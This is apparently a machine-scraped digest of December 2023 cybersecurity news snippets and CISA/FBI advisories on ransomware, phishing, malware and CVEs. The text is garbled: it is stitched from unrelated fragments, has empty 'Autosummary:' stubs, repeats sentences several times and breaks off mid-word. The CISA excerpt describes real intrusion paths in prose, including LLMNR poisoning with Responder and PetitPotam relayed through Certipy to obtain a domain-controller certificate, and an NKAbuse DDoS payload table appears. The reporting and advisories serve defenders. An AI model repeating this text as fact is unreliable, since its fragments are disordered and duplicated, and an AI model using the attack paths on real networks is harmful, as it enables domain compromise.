All of the impersonated organizations seen by BleepingComputer are crypto-related accounts, such as Binance (11 million followers), the Ethereum Foundation (3 million), zkSync (1.3 million), and Chainlink (1 million). "Autosummary:
Phishing the account"s backup codes (Trustwave) Despite the campaign being characterized by multiple signs of fraud, like the sender"s address, the redirection page, and phishing page URLs, the convincing design and sense of urgency could still trick a significant percentage of targets into giving away their account credentials and backup codes. "Autosummary:
Phishing email pushing fake F5 BIG-IP update Source: INCD For Windows users, the email pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named update.sh [VirusTotal]. "Autosummary:
"Autosummary:
All of the impersonated organizations seen by BleepingComputer are crypto-related accounts, such as Binance (11 million followers), the Ethereum Foundation (3 million), zkSync (1.3 million), and Chainlink (1 million). "Autosummary:
Below is the list of actively exploited zero-day vulnerabilities in Chrome addressed by Google this year: CVE-2023-6345 is the sixth actively exploited zero-day vulnerability in Chrome addressed by Google this year, the other ones are: CVE-2023-2033 – Type Confusion in V8 – Type Confusion in V8 CVE-2023-2136 – Integer overflow in the Skia graphics library – Integer overflow in the Skia graphics library CVE-2023-3079 – Type Confusion in V8 – Type Confusion in V8 CVE-2023-4863 – Heap buffer overflow in WebP – Heap buffer overflow in WebP CVE-2023-5217 – "Autosummary:
"Autosummary:
The ransomware attack on Westpole is disrupting digital services for Italian public administration Pierluigi Paganini December 19, 2023 December 19, 2023 An alleged Lockbit 3.0 ransomware attack on the Italian cloud service provider Westpole disrupted multiple services of local and government organizations and municipalities. "Ransomware attacks can have severe consequences, causing financial losses, reputational damage, and operational disruptions. The methods used to deliver ransomware vary, including phishing emails, malicious websites, and exploiting vulnerabilities in software or operating systems. Cybercriminals often target organizations with weak cybersecurity measures, outdated software, or inadequate employee training on recognizing and preventing phishing attacks. In this article, you will find excerpts from ransomware attacks surveys we covered in 2023. Using this data, your security team … More
The post Ransomware trends and recovery strategies companies should know appeared first on Help Net Security.
"Autosummary:
Ransomware attacks set to break records in 2023 Ransomware attacks continue at a record-breaking pace, with Q3 2023 global ransomware attack frequency up 11% over Q2 and 95% year-over-year (YoY), according to Corvus Insurance. Ransomware groups are shifting their focus away from larger targets US-based organizations remain a prime target for ransomware operators, with the highest number of ransomware victims in the first half of 2023 (949) – accounting for nearly half of all ransomware attacks. "Autosummary:
"Autosummary:
The threat actors behind the Play ransomware are estimated to have impacted approximately 300 entities as of October 2023, according to a new joint cybersecurity advisory from Australia and the U.S. "Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia," authorities said. "Autosummary:
"[F]or some customers, other information may also have been included, such as names, contact information, last four digits of social security numbers, dates of birth and/or secret questions and answers. "In the ever-evolving landscape of banking and financial security, new malware variants poses a significant and imminent challenge. Traditionally, both the identification and classification of these threats only occurred post-attack, leaving banks and financial institutions vulnerable to substantial losses and reputational damage. Cleafy has unveiled technology to proactively classify, detect and respond to new malware variants in real-time, providing an innovative solution to an escalating problem. This product update comes as a result of a … More
The post Cleafy improves banking security with real-time AI capabilities appeared first on Help Net Security.
"Autosummary:
The continuous matching capability, a crucial part of this new product release, ensures that all Cleafy customers can detect the new malware variant in real-time, without the need for time-consuming retro-matching activities. "Security researchers have discovered a vulnerability (CVE-2023-48795) in the SSH cryptographic network protocol that could allow an attacker to downgrade the connection’s security by truncating the extension negotiation message. The Terrapin attack Terrapin is a prefix truncation attack targeting the SSH protocol. “By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the … More
The post SSH vulnerability exploitable in Terrapin attacks (CVE-2023-48795) appeared first on Help Net Security.
"Autosummary:
Vendors/maintainers of affected implementations, applications and Linux distros have been pushing out fixes: AsyncSSH, LibSSH, OpenSSH, PuTTY, Transmit, SUSE, and others. "Autosummary:
The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix. "Autosummary:
"Autosummary:
" FBI seizure message on ALPHV data leak site Source: BleepingComputer.com The seizure message states the law enforcement operation was conducted by police and investigative agencies from the US, Europol, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, and Austria. "Autosummary:
Matveev, besides working as an affiliate for Conti, LockBit, Hive, Monti, Trigona, and NoEscape, also had a management-level role with the Babuk ransomware group up until early 2022, while sharing what"s being described as a "complex relationship" with another actor named Dudka, who is likely the developer behind Babuk and Monti. "Autosummary:
"According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments. "Autosummary:
"Autosummary:
"From the Campaigns screen, affiliates can see the victim entity, full ransom price demanded, discount ransom price, expiration date, cryptocurrency addresses, cryptocurrency transactions, type of computer system compromised, ransom demand note, chats with the victim, and more. "Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as Dec. 6, 2023.
This advisory provides updates to the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released April 19, 2022. Since previous reporting, ALPHV Blackcat actors released a new version of the malware, and the FBI identified over 1000 victims worldwide targeted via ransomware and/or data extortion.
FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ALPHV Blackcat ransomware and data extortion incidents.
In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which was rewritten to provide additional features to affiliates, such as better defense evasion and additional tooling. This ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, and VMWare instances. ALPHV Blackcat affiliates have extensive networks and experience "
Autosummary:
Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.Regularly educate users on identifying suspicious emails and links, not interacting with those suspicious items, and the importance of reporting instances of opening suspicious emails, links, attachments, or other potential lures.Regularly educate users on identifying suspicious emails and links, not interacting with those suspicious items, and the importance of reporting instances of opening suspicious emails, links, attachments, or other potential lures.ALPHV Blackcat affiliates use the open source adversary-in-the-middle attack [T1557] framework Evilginx2, which allows them to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies.After exfiltrating and/or encrypting data, ALPHV Blackcat affiliates communicate with victims via TOR [S0183], Tox, email, or encrypted applications.According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments. "Autosummary:
"Autosummary:
It has multiple operational states determined by a "mlink" flag set by the server, including injecting prompts for phone numbers or OTP tokens, displaying error messages, or simulating page loading, all part of its data-stealing strategy. "Autosummary:
The FBI lets readers know it is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Screenshot of the PLAY leak site The joint CSA emphasizes the importance of having an actionable recovery plan, using multi-factor authentication (MFA), and keeping all operating systems, software, and firmware up to date. "Autosummary:
The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol. Because of their actions, we are introducing new rules, or rather, we are removing ALL rules except one, you cannot touch the CIS, you can now block hospitals, nuclear power plants, anything, anywhere. "Autosummary:
The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol. Because of their actions, we are introducing new rules, or rather, we are removing ALL rules except one, you cannot touch the CIS, you can now block hospitals, nuclear power plants, anything, anywhere. "Autosummary:
"In this Help Net Security interview, Michael Gorelik, CTO and Head of Malware Research at Morphisec, provides insights into the business impact of vulnerabilities. Gorelik discusses challenges posed by regulatory frameworks, incomplete asset inventories, and manual methods, while also exploring the role of automated systems, the future of vulnerability prioritization in the face of evolving cyber threats, and key factors organizations should consider in building effective remediation strategies. How does understanding the business impact of … More
The post Creating a formula for effective vulnerability prioritization appeared first on Help Net Security.
"Autosummary:
For this, vulnerability management systems should offer multiple options to drive efforts, including the grouping of computing assets by business context, factoring the exposure of entire hosts (computing devices), aggregating vulnerabilities on applications, and presenting exploitability and the potential of exploitability for vulnerabilities. The management of vulnerabilities is a key component in many compliance and regulatory frameworks such as NIST CSF, PCI DSS (Payment Card Industry Data Security Standard), NERC CIP (North American Electric Reliability Corporation Critical Infrastructure Protection), CIS (Center for Internet Security) critical security controls, GDPR (General Data Protection Regulation) and others. Gorelik discusses challenges posed by regulatory frameworks, incomplete asset inventories, and manual methods, while also exploring the role of automated systems, the future of vulnerability prioritization in the face of evolving cyber threats, and key factors organizations should consider in building effective remediation strategies. "Autosummary:
The development also follows the release of a new advisory from CISA that outlines security countermeasures for healthcare and critical infrastructure entities to fortify their networks against potential malicious activity and reduce the likelihood of domain compromise - Enforce strong passwords and phishing-resistant MFA Ensure that only ports, protocols, and services with validated business needs are running on each system Configure Service accounts with only the permissions necessary for the services they operate Change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems Discontinue reuse or sharing of administrative credentials among user/administrative accounts Mandate consistent patch management Implement network segregation controls Evaluate the use of unsupported hardware and software and discontinue where possible Encrypt personally identifiable information (PII) and other sensitive data On a related note, the U.S. National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and CISA published a list of recommended practices that organizations can adopt in order to harden the software supply chain and improve the safety of their open-source software management processes. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The targeted system contained customer names, phone numbers, and email addresses among other customer account metadata, including system logs for one customer. "Autosummary:
"The similarity is apparent at many levels: custom executable formats, the use of similar virtual filesystems, identical paths to some of the components, reused functions, similar use of steganography, use of LUA scripts, and overall analogous design," the researchers said, describing the malware"s development as "fast-paced and ongoing. "Autosummary:
The defendants – Lu Zhang, 36, of Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, Rosemead, California; and Hailong Zhu, 40, Naperville, Illinois – have been charged with conspiracy to commit money laundering, concealment money laundering, and international money laundering. "Autosummary:
Qakbot is back and targets the Hospitality industry Pierluigi Paganini December 18, 2023 December 18, 2023 Experts warn of a new phishing campaign distributing the QakBot malware, months after law enforcement dismantled its infrastructure. "Autosummary:
"Autosummary:
Apart from the brands mentioned above, VF Corp. owns Dickies, Eastpak, Kipling, Napapijri, AND1, JanSport, Icebreaker, Altra Running, and SmartWool. "Autosummary:
"This includes requiring multifactor authentication, maintaining offline backups of data, implementing a recovery plan, and keeping all operating systems, software, and firmware up to date." "Autosummary:
The security issues, which were addressed by Microsoft in August and October 2023, respectively, are listed below - CVE-2023-35384 (CVSS score: 5.4) - Windows HTML Platforms Security Feature Bypass Vulnerability (CVSS score: 5.4) - Windows HTML Platforms Security Feature Bypass Vulnerability CVE-2023-36710 (CVSS score: 7.8) - Windows Media Foundation Core Remote Code Execution Vulnerability CVE-2023-35384 has been described by Akamai as a bypass for a critical security flaw that Microsoft patched in March 2023. "Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SCS 9001 2.0 reveals enhanced controls for global supply chains In this Help Net Security interview, Mike Regan, VP of Business Performance at TIA, discusses SCS 9001 Release 2.0, a certifiable standard crafted to assist organizations in operationalizing the NIST and other government guidelines and frameworks. Balancing AI advantages and risks in cybersecurity strategies In this Help Net Security interview, … More
The post Week in review: Apache Struts vulnerability exploit attempt, EOL Sophos firewalls get hotfix appeared first on Help Net Security.
"Autosummary:
A closer look at LATMA, the open-source lateral movement detection tool In this Help Net Security video, Gal Sadeh, Head of Data and Security Research at Silverfort, discusses LATMA, a free, open-source tool.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SCS 9001 2.0 reveals enhanced controls for global supply chains In this Help Net Security interview, Mike Regan, VP of Business Performance at TIA, discusses SCS 9001 Release 2.0, a certifiable standard crafted to assist organizations in operationalizing the NIST and other government guidelines and frameworks. "Autosummary:
The experts reported that the InfectedSlurs botnet is exploiting a remote code execution (RCE) vulnerability, tracked as CVE-2023-47565 (CVSS score 8.0), in QNAP VioStor NVR (Network Video Recorder) devices. "Autosummary:
MongoDB investigates a cyberattack, customer data exposed Pierluigi Paganini December 17, 2023 December 17, 2023 MongoDB on Saturday announced it is investigating a cyberattack that exposed customer account metadata and contact information. "Autosummary:
Other Google ads promoted websites that pretended to be download sites for legitimate software, including Grammarly, MSI Afterburner, Slack, Dashlane, Malwarebytes, Audacity, μTorrent, OBS, Ring, AnyDesk, Libre Office, Teamviewer, Thunderbird, and Brave. "Autosummary:
The stealer is sold to cybercriminals via a subscription model, so it is distributed to targets using a variety of channels, including malvertizing, laced torrent downloads, emails, YouTube videos, and more. "Autosummary:
In the past, Qakbot has partnered with multiple ransomware operations, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta and BlackCat/ALPHV. "Autosummary:
The malware supports multiple Distributed Denial of Service (DDoS) attacks, below is a list of the flooding payloads: Command Attack Default/0 http_flood_HTTPGetFloodPayload 1 http_flood_HTTPPostFloodPayload 2 tcp_flood_TCPFloodPayload 3 udp_flood_UDPFloodPayload 4 ping_flood_PINGFloodPayload 5 tcp_syn_flood_TCPSynFloodPayload 6 ssl_flood_SSLFloodPayload 7 http_slowloris_HTTPSlowlorisPayload 8 http_slow_body_HTTPSlowBodyPayload 9 http_slow_read_HTTPSlowReadPayload 10 icmp_flood_ICMPFloodPayload 11 dns_nxdomain_DNSNXDOMAINPayload NKAbuse also supports multiple backdoor features that turn it into powerful remote access trojan (RAT), “Although relatively rare, new cross-platform flooders and backdoors like NKAbuse stand out through their utilization of less common communication protocols. "Autosummary:
"Autosummary:
The threats were sent to a number of former and current Fred Hutch patients — as well as some who have received care from Hutch partner UW Medicine — and claimed the names, Social Security numbers, phone numbers, medical history, lab results and insurance history of more than 800,000 patients had been compromised.” reported the Seattle Times.Hunters International ransomware gang claims to have hacked the Fred Hutch Cancer Center Pierluigi Paganini December 16, 2023 December 16, 2023 The Hunters International ransomware gang claims to have hacked the Fred Hutchinson Cancer Center (Fred Hutch). "Autosummary:
"Autosummary:
"Autosummary:
"Ransomware has become a pervasive threat, compromising the security and functionality of vital systems across the United States. While governmental pledges and public declarations of intent to fight cybercrime are foundational, they often lack the immediate and tangible impact necessary to counter sophisticated cyber threats. Case in point – the US recently pledged, along with 39 other countries, not to pay ransoms. In theory this makes sense: don’t pay, the bad guys don’t make money … More
The post Fortifying cyber defenses: A proactive approach to ransomware resilience appeared first on Help Net Security.
"Autosummary:
This approach can also foster public-private partnerships, as government agencies can collaborate with cutting-edge technology firms to develop new standards, best practices, and adapt commercial tools for government use, ensuring the most robust protection possible. By purchasing and deploying advanced tools to stop ransomware in its tracks, the government can protect its assets and citizens, deter adversaries, stimulate the cybersecurity sector, and set a standard for private sector organizations to emulate. "Autosummary:
The server hosting the malware houses eight different versions of NKAbuse to support various CPU architectures: i386, arm64, arm, amd64, mips, mipsel, mips64, and mips64el. "Autosummary:
BianLian, White Rabbit, and Mario Ransomware Gangs Spotted in a Joint Campaign Pierluigi Paganini December 15, 2023 December 15, 2023 Resecurity has uncovered a meaningful link between three major ransomware groups, BianLian, White Rabbit, and Mario Ransomware. "Autosummary:
“On November 20, 2023, INL was informed that a cyber data breach occurred on November 19, 2023, at an off-site data center that housed information on INL employees, former employees, spouses, and dependents. "Autosummary:
"Autosummary:
Lu Zhang, a 36-year-old woman from Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, of Rosemead, California; and 40-year-old Hailong Zhu, of Naperville, Illinois, have all been charged in relation to the alleged "pig butchering" scam that saw targets approached via dating sites and social media. "Autosummary:
Common Attack Methods The three most common vulnerabilities that exist in this space are Injections (SQL, Remote Code), Cryptographic Failures (previously sensitive data exposure), and Broken Access Control (BAC).This critical vulnerability, from 2019, affected Apache HTTP servers running on Unix systems, especially those utilizing the mod_prefork, mod_worker, and mod_event libraries.Query Execution: The SQL query is executed with the user input as a parameter: As such, the query enters the backend as below: In this code, the (user_input,) is a tuple containing the user"s input. Injections SQL is the most common Database software that is used, and hosts a plethora of payment data, PII data, and internal business records. "Autosummary:
Snatch ransomware gang claims the hack of the food giant Kraft Heinz Pierluigi Paganini December 15, 2023 December 15, 2023 The Snatch ransomware group announced it had hacked the food giant Kraft Heinz, the company is investigating the claims. "Autosummary:
"This SbD Alert urges technology manufacturers to proactively eliminate the risk of default password exploitation," CISA said, by taking "ownership of customer security outcomes" and building "organizational structure and leadership to achieve these goals. "Autosummary:
As reported by the Seattle Times, the attackers emailed many patients stating they have the names, Social Security numbers, phone numbers, medical history, lab results, and insurance history of over 800,000 patients. "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @demonslay335, @billtoulas, @fwosar, @Seifreed, @serghei, @BleepinComputer, @LawrenceAbrams, @Ionut_Ilascu, @ValeryMarchive, @BushidoToken, @azalsecurity, @SentinelOne, @g0njxa, @AlvieriD, @ShadowStackRE, @AShukuhi, @BrettCallow, @GossiTheDog, @vmiss33, @pcrisk, and @RESecurity. In other news, we learned about numerous ransomware attacks over the past two weeks, including: Finally, law enforcement has had some confirmed actions this week, including arresting a money launderer linked to Hive ransomware and a Russian pleading guilty to running a crypto exchange used by ransomware gangs. "Autosummary:
"What will 2024 hold for the cybersecurity landscape? In this Help Net Security video, Steve Cobb, CISO at SecurityScorecard, offers his take on what professionals can expect next year.
The post Staying ahead in 2024 with top cybersecurity predictions appeared first on Help Net Security.
"Autosummary:
"Microsoft ICSpector is an open-source forensics framework that enables the analysis of industrial PLC metadata and project files. Architecture The framework provides investigators with a convenient way to scan for PLCs and identify any suspicious artifacts within ICS environments, which can be used for manual checking, automated monitoring tasks, or incident response operations to detect compromised devices. ICSpector allows investigators to review and customize the output to their requirements. It’s available on GitHub.
The post Microsoft ICSpector: A leap forward in industrial PLC metadata analysis appeared first on Help Net Security.
"Autosummary:
"Attackers are trying to leverage public proof-of-exploit (PoC) exploit code for CVE-2023-50164, the recently patched path traversal vulnerability in Apache Struts 2. “Attackers aim to deploy webshells, with some cases targeting the parameter ‘fileFileName’ – a deviation from the original exploit PoC,” Akamai’s Security Intelligence Group flagged on Wednesday. The Shadowserver Foundation has also started noticing exploitation attempts in their sensors, though they don’t see them succeeding. About the vulnerability CVE-2023-50164, reported by Steven Seeley … More
The post Attackers are trying to exploit Apache Struts vulnerability (CVE-2023-50164) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The authorities reported that from June 2021 through at least November 2022, threat actors targeted a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH). "Russian state-sponsored hackers have been exploiting CVE-2023-42793 to target unpatched, internet-facing JetBrains TeamCity servers since September 2023, US, UK and Polish cybersecurity and law enforcement authorities have warned. The targets APT 29 (aka CozyBear, aka Midnight Blizzard), believed to be associated with the Russian Foreign Intelligence Service (SVR), has been active since 2013. The group is known for targeting a wide variety of organizations: government agencies, think tanks, political organizations, diplomatic agencies, biomedical and energy … More
The post Russian hackers target unpatched JetBrains TeamCity servers appeared first on Help Net Security.
"Autosummary:
These attacks seem to be opportunistic in nature and hit disparate organizations in the US, Europe, Asia, and Australia: “an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.” "Autosummary:
Join Now Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others. "Autosummary:
OilRig, also known as APT34, Crambus, Cobalt Gypsy, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber espionage group that"s known to be active since at least 2014, using a wide range of malware at its disposal to target entities in the Middle East. "Autosummary:
Targets of the campaign include an energy trade association; firms that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT enterprises. "The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments," cybersecurity agencies from Poland, the U.K., and the U.S. said. "Autosummary:
SiegedSec claims the data they leaked online includes a wide range of sensitive information, including affected individuals" full names, dates of birth, email addresses, phone numbers, Social Security Numbers (SSN), physical addresses, and employment information. "Autosummary:
According to a press release from the US Attorney"s office, Brody deleted code repositories the bank stored in the cloud, ran a script to delete logs, left "taunts" for former colleagues within bank code, and impersonated other employees by opening sessions in their names. "Autosummary:
Image So, the attacker receives the invitation to fill out the form - and when they complete it, they enter their intended victim"s email address into the form, not their own. Call-back phishing dupes unsuspecting victims into telephoning a fraudulent call centre, where they will speak to an actual human being - who will then trick them into downloading and running malware, providing malicious hackers with remote access to their PC. "Bitdefender unveiled Bitdefender Scamio, a complimentary scam detection service designed to help users verify fraudulent online schemes delivered by email, embedded links, text, and instant messaging through collaboration with a chatbot powered by AI. Online fraud continues to increase each year. According to a Federal Trade Commission (FTC) report, consumer losses to fraud in 2022 totaled $8.8 billion, a 30% increase from the previous year. Scams delivered via text messaging alone accounted for $330 million … More
The post Bitdefender Scamio helps users verify fraudulent online schemes appeared first on Help Net Security.
"Autosummary:
“The rapid rise of AI adoption by cybercriminals to dupe people out of money, steal personal information, and infiltrate their digital lives has become a true game changer,” said Ciprian Istrate, SVP of operations, Consumer Solutions Group at Bitdefender. "Autosummary:
"In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week. "Autosummary:
“Identified victims included: an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.” “The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.” reads the joint Cybersecurity Advisory (CSA) titled Russian Foreign Intelligence Service (SVR) "Autosummary:
DDoS attack commands (Kaspersky) "All these payloads historically have been used by botnets, so, when combined with the NKN as the communication protocol, the malware can asynchronously wait for the master to launch a combined attack," Kaspersky says. "Autosummary:
Regarding the most targeted countries, first on the list is the United States (109 targeted bank apps), followed by the United Kingdom (48 bank apps), Italy (44 apps), Australia (34), Turkey (32), France (30), Spain (29), Portugal (27), Germany (23), and Canada (17). Overview of the ten banking trojans that emerged in 2023 (Zimperium) Of the malware families that existed in 2022 and were updated for 2023, those that maintain notable activity are Teabot, Exobot, Mysterybot, Medusa, Cabossous, Anubis, and Coper. "Autosummary:
In this case, the attacker gets the ability to write a server-side rendered file, such as a JSP (Jakarta Server Pages) file, into a target directory. "Autosummary:
In January, the agency took down one of ALPHV’s contemporaries, Hive, and revealed it had penetrated the group’s infrastructure six months prior: Since late July 2022, the FBI has penetrated Hive’s computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded. Many of the group’s negotiation links are reportedly not working either, meaning that victims looking to pay off the gang are stuck in limbo, and its likely that neither the ALPHV group, nor the affiliates who use its ransomware to carry out attacks, are being paid.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "In January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a Risk and Vulnerability Assessment (RVA) at the request of a Healthcare and Public Health (HPH) sector organization to identify vulnerabilities and areas for improvement. An RVA is a two-week penetration test of an entire organization, with one week spent on external testing and one week spent assessing the internal network. As part of the RVA, the CISA assessment team conducted web application, phishing, penetration, database, and wireless assessments. The assessed organization was a large organization deploying on-premises software.
During the one-week external assessment, the assessment team did not identify any significant or exploitable conditions in externally available systems that may allow a malicious actor to easily obtain initial access to the organization’s network. Furthermore, the assessment team was unable to gain initial access to the assessed organization through phishing. However, during internal penetration testing, the team exploited misconfigurations, weak passwords, and other issues through multiple attack paths to compromise the organization’s domain.
In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the RVA team’s activities and key findings to provide network defenders and software manufacturers recommendations for improving their organizations’ and customers’ cyber posture, which reduces the impact of follow-on activity after initial access. CISA encourages the HPH sector and other critical infrastructure organizations deploying on-premises software, as well as software manufacturers, to apply the recommendations in the Mitigations section of this CSA to harden networks against malicious activity and to reduce the likelihood of domain compromise "
Autosummary:
Noted Strengths The CISA team noted the following business, technical, and administrative components that enhanced the network security posture of the tested environment: The organization’s network was found to have several strong, security-oriented characteristics such as: Effective antivirus software; Endpoint detection and response capabilities; Good policies and best practices for protecting users from malicious files including not allowing users to mount ISO files; Minimal external attack surface, limiting an adversary’s ability to leverage external vulnerabilities to gain initial access to the organization’s networks and systems; Strong wireless protocols; And network segmentation.| ly4k / Certipy [8] Github | topotam / PetitPotam [9] Github | fortra / impacket / examples [10] Github | login-securite / DonPAPI [11] SP 800-63B, Digital Identity Guidelines: Authentication and Lifecycle Management | CSRC (nist.gov) APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES Table 7: CISA Team ATT&CK Techniques for Reconnaissance Reconnaissance Technique Title ID Use Active Scanning:Before deploying any new devices in a networked environment, change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems to have values consistent with administration-level accounts [CPG 2.A]. RESOURCES REFERENCES [1] Github | kgretzky / evilginx [2] Github | lgandx / Responder [3] Network security LAN Manager authentication level - Windows Security | Microsoft Learn [4] Service principal names - Win32 apps | Microsoft Learn [5] Github | fortra / impacket 6] Github | byt3bl33d3r / Phase II: Internal Assessment Database, Web Application, and Wireless Testing The CISA assessment team did not identify any significant or exploitable conditions from database or wireless testing that may allow a malicious actor to easily compromise the confidentiality, integrity, and availability of the tested environment.The assessment team identified legacy name resolution protocols (e.g., NetBIOS, LLMNR, mDNS) enabled in the network, and abused LLMNR to capture NTLMv2 hashes, which they then cracked and used for domain access.Recognizing that insecure software is the root cause of the majority of these flaws, and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team: Embed security into product architecture throughout the entire software development lifecycle (SDLC).The focus areas for this mitigation strategy include asset management and asset security, addressing asset inventory, procurement, decommissioning, and network segmentation as they relate to hardware, software, and data assets. Attack Path 1 The assessment team initiated LLMNR/NBT-NS/mDNS/DHCP poisoning [T1557.001] with Responder[2], which works in two steps: Responder listens to multicast name resolution queries (e.g., LLMNR UDP/5355 , NBTNS UDP/137 ) Mitigation Strategy #1 Asset Management and Security: CISA recommends that HPH sector organizations implement and maintain an asset management policy to reduce the risk of exposing vulnerabilities, devices, or services that could be exploited by threat actors to gain unauthorized access, steal sensitive data, or disrupt critical services.As part of the RVA, the CISA assessment team conducted web application, phishing, penetration, database, and wireless assessments.The focus areas for this mitigation strategy include email security, phising prevention, access management, password policies, data protection and loss prevention, and device logs and monitoring solutions.Disable deprecated protocols (including NetBIOS, LLMNR, and mDNS) on the network that are not strictly necessary for business functions, or limit the systems and services that use the protocol, where possible [CPG 2.W].Disable deprecated protocols (including NetBIOS, LLMNR, and mDNS) on the network that are not strictly necessary for business functions, or limit the systems and services that use the protocol, where possible [CPG 2.W]. Introduction CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks.If a malicious actor compromised ACCOUNT 1, they could use it to modify, power off [T1529], and/or delete critical virtual machines, including domain controllers and file servers.However, during internal penetration testing, the team exploited misconfigurations, weak passwords, and other issues through multiple attack paths to compromise the organization’s domain.The CISA team assessed that with ACCOUNT 1, they could use it to modify, power off, and/or delete critical virtual machines, including domain controllers and file servers.To demonstrate how this misconfiguration could lead to privilege escalation, the assessment team, leveraging its status as a mere authenticated user, briefly changed the WebServer template properties to set Client Authentication to True so that a certificate could be obtained for server authentication, ensuring the property was set back to its original setting of False immediately thereafter.Conduct periodic scans of server machines using automated tools to determine whether sensitive data (e.g., personally identifiable information, health, credit card, or classified information) is present on the system in cleartext.Conduct periodic scans of server machines using automated tools to determine whether sensitive data (e.g., personally identifiable information, health, credit card, or classified information) is present on the system in cleartext.Conduct periodic scans of server machines using automated tools to determine whether sensitive data (e.g., personally identifiable information, health, credit card, or classified information) is present on the system in cleartext. Figure 3: Misconfigured ADCS Enumerated via Certipy The team used PetitPotam [8] with ACCOUNT 4 credentials to force the organization’s domain controller to authenticate to the CISA-operated machine and then used Certipy to relay the coerced authentication attempt to the ADCS web enrollment service to receive a valid certificate for ACCOUNT 5, the domain controller machine account.The CISA team accessed a virtual machine interface enabling them to modify, power off, and/or delete critical virtual machines including domain controllers, file servers, and servers. , when possible, in accordance with applicable federal standards, industry best practices, and/or agency-defined requirements. The CISA team validated the privileges of these accounts by checking for READ,WRITE access on a domain controller C$ share [T1039], demonstrating Domain Administrator access and therefore domain compromise.Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.Use unique credentials across workstations , when possible, in 